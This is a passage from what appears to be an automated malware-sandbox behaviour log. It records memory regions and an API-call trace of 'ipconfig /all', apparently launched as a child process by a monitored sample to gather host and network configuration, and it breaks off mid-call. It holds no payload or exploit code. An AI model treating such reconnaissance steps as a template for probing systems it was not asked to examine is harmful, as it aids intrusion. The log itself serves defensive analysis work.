= "private_0x0000000001e60000" filename = "" Region: id = 1103 start_va = 0x2000000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Thread: id = 23 os_tid = 0x121c Thread: id = 24 os_tid = 0x1254 Thread: id = 25 os_tid = 0x1214 Process: id = "6" image_name = "ipconfig.exe" filename = "c:\\windows\\system32\\ipconfig.exe" page_root = "0x1560a000" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xde0" cmd_line = "ipconfig /all" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1137 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1138 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1139 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1140 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1141 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1142 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1143 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1144 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1145 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1146 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1147 start_va = 0x7ff686d20000 end_va = 0x7ff686d2cfff monitored = 1 entry_point = 0x7ff686d24f20 region_type = mapped_file name = "ipconfig.exe" filename = "\\Windows\\System32\\ipconfig.exe" (normalized: "c:\\windows\\system32\\ipconfig.exe") Region: id = 1148 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1149 start_va = 0x400000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1150 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1151 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1152 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1153 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1154 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1213 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1214 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1215 start_va = 0x7ffe95be0000 end_va = 0x7ffe95c4afff monitored = 0 entry_point = 0x7ffe95bf90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1216 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1217 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1218 start_va = 0x7ffe976b0000 end_va = 0x7ffe976b7fff monitored = 0 entry_point = 0x7ffe976b1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1219 start_va = 0x7ffe8d500000 end_va = 0x7ffe8d537fff monitored = 0 entry_point = 0x7ffe8d518cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1220 start_va = 0x7ffe93020000 end_va = 0x7ffe930c9fff monitored = 0 entry_point = 0x7ffe93047910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1221 start_va = 0x7ffe8d310000 end_va = 0x7ffe8d329fff monitored = 0 entry_point = 0x7ffe8d312430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1222 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1223 start_va = 0x7ffe8d330000 end_va = 0x7ffe8d345fff monitored = 0 entry_point = 0x7ffe8d3319f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1224 start_va = 0x5f0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1225 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1226 start_va = 0x6c0000 end_va = 0x9f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1227 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ipconfig.exe.mui" filename = "\\Windows\\System32\\en-US\\ipconfig.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ipconfig.exe.mui") Region: id = 1228 start_va = 0x7ffe8cfc0000 end_va = 0x7ffe8cfcafff monitored = 0 entry_point = 0x7ffe8cfc1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1229 start_va = 0x5f0000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1230 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Thread: id = 28 os_tid = 0xc68 [0123.985] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff686d20000 [0123.986] __set_app_type (_Type=0x1) [0123.986] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff686d25230) returned 0x0 [0123.986] __wgetmainargs (in: _Argc=0x7ff686d29028, _Argv=0x7ff686d29030, _Env=0x7ff686d29038, _DoWildCard=0, _StartInfo=0x7ff686d29044 | out: _Argc=0x7ff686d29028, _Argv=0x7ff686d29030, _Env=0x7ff686d29038) returned 0 [0123.986] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.986] setlocale (category=0, locale="") returned="English_United States.1252" [0123.988] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.991] __iob_func () returned 0x7ffe97fce210 [0123.991] _fileno (_File=0x7ffe97fce240) returned 1 [0123.991] _get_osfhandle (_FileHandle=1) returned 0x61c [0123.991] GetFileType (hFile=0x61c) returned 0x1 [0123.991] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcfe30, nSize=0x50 | out: lpBuffer="") returned 0x0 [0123.991] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="debug", cchCount1=-1, lpString2="all", cchCount2=-1) returned 3 [0123.994] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="allcompartments", cchCount1=-1, lpString2="all", cchCount2=-1) returned 3 [0123.994] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="all", cchCount1=-1, lpString2="all", cchCount2=-1) returned 2 [0123.994] __iob_func () returned 0x7ffe97fce210 [0123.994] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2710, dwLanguageId=0x0, lpBuffer=0xcfda0, nSize=0x0, Arguments=0xcfda8 | out: lpBuffer="䂀G") returned 0x1e [0124.019] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.019] _fileno (_File=0x7ffe97fce240) returned 1 [0124.019] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.019] GetFileType (hFile=0x61c) returned 0x1 [0124.019] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcfc80, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.019] _fileno (_File=0x7ffe97fce240) returned 1 [0124.019] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.019] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0124.019] LocalAlloc (uFlags=0x40, uBytes=0x1f) returned 0x4780c0 [0124.019] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x4780c0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nWindows IP Configuration\r\n\r\n", lpUsedDefaultChar=0x0) returned 31 [0124.019] _fileno (_File=0x7ffe97fce240) returned 1 [0124.019] _write (in: _FileHandle=1, _Buf=0x4780c0*, _MaxCharCount=0x1e | out: _Buf=0x4780c0*) returned 30 [0124.021] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.021] _fileno (_File=0x7ffe97fce240) returned 1 [0124.021] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.021] LocalFree (hMem=0x4780c0) returned 0x0 [0124.021] LocalFree (hMem=0x474080) returned 0x0 [0124.021] GetComputerNameExW (in: NameType=0x1, lpBuffer=0xcfb60, nSize=0xcfb50 | out: lpBuffer="xc64ZB", nSize=0xcfb50) returned 1 [0124.022] __iob_func () returned 0x7ffe97fce210 [0124.022] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2711, dwLanguageId=0x0, lpBuffer=0xcfb00, nSize=0x0, Arguments=0xcfb08 | out: lpBuffer="㫐G") returned 0x2f [0124.022] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.022] _fileno (_File=0x7ffe97fce240) returned 1 [0124.022] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.022] GetFileType (hFile=0x61c) returned 0x1 [0124.022] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf9e0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.022] _fileno (_File=0x7ffe97fce240) returned 1 [0124.022] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.022] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Host Name . . . . . . . . . . . . : xc64ZB\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0124.022] LocalAlloc (uFlags=0x40, uBytes=0x30) returned 0x475070 [0124.022] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Host Name . . . . . . . . . . . . : xc64ZB\r\n", cchWideChar=-1, lpMultiByteStr=0x475070, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Host Name . . . . . . . . . . . . : xc64ZB\r\n", lpUsedDefaultChar=0x0) returned 48 [0124.022] _fileno (_File=0x7ffe97fce240) returned 1 [0124.022] _write (in: _FileHandle=1, _Buf=0x475070*, _MaxCharCount=0x2f | out: _Buf=0x475070*) returned 47 [0124.022] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.022] _fileno (_File=0x7ffe97fce240) returned 1 [0124.022] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.022] LocalFree (hMem=0x475070) returned 0x0 [0124.022] LocalFree (hMem=0x473ad0) returned 0x0 [0124.022] GetComputerNameExW (in: NameType=0x2, lpBuffer=0xcfb60, nSize=0xcfb50 | out: lpBuffer="", nSize=0xcfb50) returned 1 [0124.023] __iob_func () returned 0x7ffe97fce210 [0124.023] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2712, dwLanguageId=0x0, lpBuffer=0xcfb00, nSize=0x0, Arguments=0xcfb08 | out: lpBuffer="㫐G") returned 0x29 [0124.023] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.023] _fileno (_File=0x7ffe97fce240) returned 1 [0124.023] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.023] GetFileType (hFile=0x61c) returned 0x1 [0124.023] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf9e0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.023] _fileno (_File=0x7ffe97fce240) returned 1 [0124.023] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Primary Dns Suffix . . . . . . . : \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0124.023] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x475070 [0124.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Primary Dns Suffix . . . . . . . : \r\n", cchWideChar=-1, lpMultiByteStr=0x475070, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Primary Dns Suffix . . . . . . . : \r\n", lpUsedDefaultChar=0x0) returned 42 [0124.023] _fileno (_File=0x7ffe97fce240) returned 1 [0124.023] _write (in: _FileHandle=1, _Buf=0x475070*, _MaxCharCount=0x29 | out: _Buf=0x475070*) returned 41 [0124.023] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.023] _fileno (_File=0x7ffe97fce240) returned 1 [0124.023] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.023] LocalFree (hMem=0x475070) returned 0x0 [0124.023] LocalFree (hMem=0x473ad0) returned 0x0 [0124.023] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0xcfb50 | out: pFixedInfo=0x0, pOutBufLen=0xcfb50) returned 0x6f [0124.084] GetProcessHeap () returned 0x470000 [0124.084] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x258) returned 0x47bb80 [0124.084] GetNetworkParams (in: pFixedInfo=0x47bb80, pOutBufLen=0xcfb50 | out: pFixedInfo=0x47bb80, pOutBufLen=0xcfb50) returned 0x0 [0124.096] __iob_func () returned 0x7ffe97fce210 [0124.096] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2725, dwLanguageId=0x0, lpBuffer=0xcfb00, nSize=0x0, Arguments=0xcfb08 | out: lpBuffer="ㆀH") returned 0x2f [0124.096] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.096] _fileno (_File=0x7ffe97fce240) returned 1 [0124.096] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.096] GetFileType (hFile=0x61c) returned 0x1 [0124.096] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf9e0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.096] _fileno (_File=0x7ffe97fce240) returned 1 [0124.097] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.097] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Node Type . . . . . . . . . . . . : Hybrid\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0124.097] LocalAlloc (uFlags=0x40, uBytes=0x30) returned 0x489ca0 [0124.097] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Node Type . . . . . . . . . . . . : Hybrid\r\n", cchWideChar=-1, lpMultiByteStr=0x489ca0, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Node Type . . . . . . . . . . . . : Hybrid\r\n", lpUsedDefaultChar=0x0) returned 48 [0124.097] _fileno (_File=0x7ffe97fce240) returned 1 [0124.097] _write (in: _FileHandle=1, _Buf=0x489ca0*, _MaxCharCount=0x2f | out: _Buf=0x489ca0*) returned 47 [0124.097] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.097] _fileno (_File=0x7ffe97fce240) returned 1 [0124.097] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.097] LocalFree (hMem=0x489ca0) returned 0x0 [0124.097] LocalFree (hMem=0x483180) returned 0x0 [0124.097] __iob_func () returned 0x7ffe97fce210 [0124.097] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x272e, dwLanguageId=0x0, lpBuffer=0xcfb00, nSize=0x0, Arguments=0xcfb08 | out: lpBuffer="ㆀH") returned 0x2b [0124.097] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.097] _fileno (_File=0x7ffe97fce240) returned 1 [0124.097] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.097] GetFileType (hFile=0x61c) returned 0x1 [0124.097] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf9e0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.097] _fileno (_File=0x7ffe97fce240) returned 1 [0124.097] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.097] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" IP Routing Enabled. . . . . . . . : No\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0124.097] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x489720 [0124.097] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" IP Routing Enabled. . . . . . . . : No\r\n", cchWideChar=-1, lpMultiByteStr=0x489720, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" IP Routing Enabled. . . . . . . . : No\r\n", lpUsedDefaultChar=0x0) returned 44 [0124.097] _fileno (_File=0x7ffe97fce240) returned 1 [0124.098] _write (in: _FileHandle=1, _Buf=0x489720*, _MaxCharCount=0x2b | out: _Buf=0x489720*) returned 43 [0124.098] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.098] _fileno (_File=0x7ffe97fce240) returned 1 [0124.098] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.098] LocalFree (hMem=0x489720) returned 0x0 [0124.098] LocalFree (hMem=0x483180) returned 0x0 [0124.098] __iob_func () returned 0x7ffe97fce210 [0124.098] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2738, dwLanguageId=0x0, lpBuffer=0xcfb00, nSize=0x0, Arguments=0xcfb08 | out: lpBuffer="ㆀH") returned 0x2b [0124.098] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.098] _fileno (_File=0x7ffe97fce240) returned 1 [0124.098] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.098] GetFileType (hFile=0x61c) returned 0x1 [0124.098] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf9e0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.098] _fileno (_File=0x7ffe97fce240) returned 1 [0124.098] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.098] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" WINS Proxy Enabled. . . . . . . . : No\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0124.098] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x489c20 [0124.098] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" WINS Proxy Enabled. . . . . . . . : No\r\n", cchWideChar=-1, lpMultiByteStr=0x489c20, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" WINS Proxy Enabled. . . . . . . . : No\r\n", lpUsedDefaultChar=0x0) returned 44 [0124.098] _fileno (_File=0x7ffe97fce240) returned 1 [0124.098] _write (in: _FileHandle=1, _Buf=0x489c20*, _MaxCharCount=0x2b | out: _Buf=0x489c20*) returned 43 [0124.098] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.098] _fileno (_File=0x7ffe97fce240) returned 1 [0124.098] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.098] LocalFree (hMem=0x489c20) returned 0x0 [0124.099] LocalFree (hMem=0x483180) returned 0x0 [0124.099] GetProcessHeap () returned 0x470000 [0124.099] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47bb80) returned 1 [0124.099] DnsQueryConfigAllocEx () returned 0x483180 [0124.099] DnsFreeConfigStructure () returned 0x1 [0124.099] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0xcfdc0*=0x0 | out: AdapterAddresses=0x0, SizePointer=0xcfdc0*=0xdb8) returned 0x6f [0124.104] LocalAlloc (uFlags=0x40, uBytes=0xdb8) returned 0x4839b0 [0124.104] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x4839b0, SizePointer=0xcfdc0*=0xdb8 | out: AdapterAddresses=0x4839b0*(Alignment=0x6000001c0, Length=0x1c0, IfIndex=0x6, Next=0x483d30, AdapterName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", FirstUnicastAddress=0x483c20, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x483cd0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0x22, [2]=0x60, [3]=0x79, [4]=0x47, [5]=0x15, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x6, ZoneIndices=([0]=0x6, [1]=0x6, [2]=0x6, [3]=0x6, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x483d00, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0x483b70*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6000ff3, FirstDnsSuffix=0x0), SizePointer=0xcfdc0*=0xdb8) returned 0x0 [0124.112] __iob_func () returned 0x7ffe97fce210 [0124.112] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2758, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x22 [0124.112] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.112] _fileno (_File=0x7ffe97fce240) returned 1 [0124.112] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.112] GetFileType (hFile=0x61c) returned 